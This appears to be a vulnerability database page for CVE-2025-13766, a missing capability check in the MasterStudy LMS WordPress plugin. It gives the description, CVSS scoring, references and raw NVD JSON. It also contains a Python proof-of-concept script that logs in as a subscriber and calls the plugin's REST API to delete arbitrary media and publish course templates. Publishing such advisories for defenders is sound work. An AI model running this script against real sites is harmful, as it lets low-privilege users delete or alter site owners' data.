CVE-2025-13766

Description

The MasterStudy LMS WordPress Plugin – for Online Courses and Education plugin for WordPress is vulnerable to unauthorized modification and deletion of data due to a missing capability checks on multiple REST API endpoints in all versions up to, and including, 3.7.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload or delete arbitrary media files, delete or modify posts, and create/manage course templates

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

MasterStudy LMS WordPress Plugin <= 3.7.6

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-13766 PoC - MasterStudy LMS权限绕过
import requests
import sys

TARGET_URL = "http://target-wordpress-site.com"
USERNAME = "attacker_subscriber"
PASSWORD = "password123"

def get_auth_cookie():
    """Get WordPress authentication cookie"""
    login_url = f"{TARGET_URL}/wp-login.php"
    session = requests.Session()
    
    login_data = {
        'log': USERNAME,
        'pwd': PASSWORD,
        'wp-submit': 'Log In',
        'redirect_to': '/wp-admin/',
        'testcookie': '1'
    }
    
    response = session.post(login_url, data=login_data)
    return session.cookies.get_dict()

def delete_arbitrary_media(cookies, attachment_id):
    """Delete arbitrary media files without proper authorization"""
    delete_url = f"{TARGET_URL}/wp-json/masterstudy-lms/v2/attachments/{attachment_id}"
    headers = {
        'X-WP-Nonce': 'attacker-nonce',  # May need to fetch valid nonce
        'Content-Type': 'application/json'
    }
    response = requests.delete(delete_url, cookies=cookies, headers=headers)
    return response.status_code == 200

def create_course_template(cookies):
    """Create course template without proper capability check"""
    api_url = f"{TARGET_URL}/wp-json/masterstudy-lms/v2/course-templates"
    headers = {
        'Content-Type': 'application/json'
    }
    payload = {
        'title': 'Malicious Course Template',
        'content': 'Injected content by attacker',
        'status': 'publish'
    }
    response = requests.post(api_url, json=payload, cookies=cookies, headers=headers)
    return response.status_code in [200, 201]

if __name__ == "__main__":
    print("[*] CVE-2025-13766 - MasterStudy LMS Authorization Bypass")
    cookies = get_auth_cookie()
    if cookies:
        print("[+] Authentication successful")
        print("[*] Attempting to create course template...")
        if create_course_template(cookies):
            print("[+] Course template created successfully (VULNERABLE)")
        else:
            print("[-] Failed to create template")
    else:
        print("[-] Authentication failed")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13766
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13766
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13766/
[4] VulDB https://vuldb.com/cve/CVE-2025-13766
[5] https://plugins.trac.wordpress.org/changeset/3422825/
[6] https://www.wordfence.com/threat-intel/vulnerabilities/id/2719739a-90dc-470b-9270-8578e0cead59?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13766", "sourceIdentifier": "[email protected]", "published": "2026-01-06T09:15:53.983", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The MasterStudy LMS WordPress Plugin – for Online Courses and Education plugin for WordPress is vulnerable to unauthorized modification and deletion of data due to a missing capability checks on multiple REST API endpoints in all versions up to, and including, 3.7.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload or delete arbitrary media files, delete or modify posts, and create/manage course templates"}, {"lang": "es", "value": "El plugin de WordPress MasterStudy LMS – para cursos en línea y educación, un plugin para WordPress es vulnerable a la modificación y eliminación no autorizadas de datos debido a la falta de comprobaciones de capacidad en múltiples puntos finales de la API REST en todas las versiones hasta la 3.7.6, inclusive. Esto hace posible que atacantes autenticados, con acceso de nivel Suscriptor y superior, suban o eliminen archivos multimedia arbitrarios, eliminen o modifiquen publicaciones, y creen/gestionen plantillas de cursos."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3422825/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2719739a-90dc-470b-9270-8578e0cead59?source=cve", "source": "[email protected]"}]}}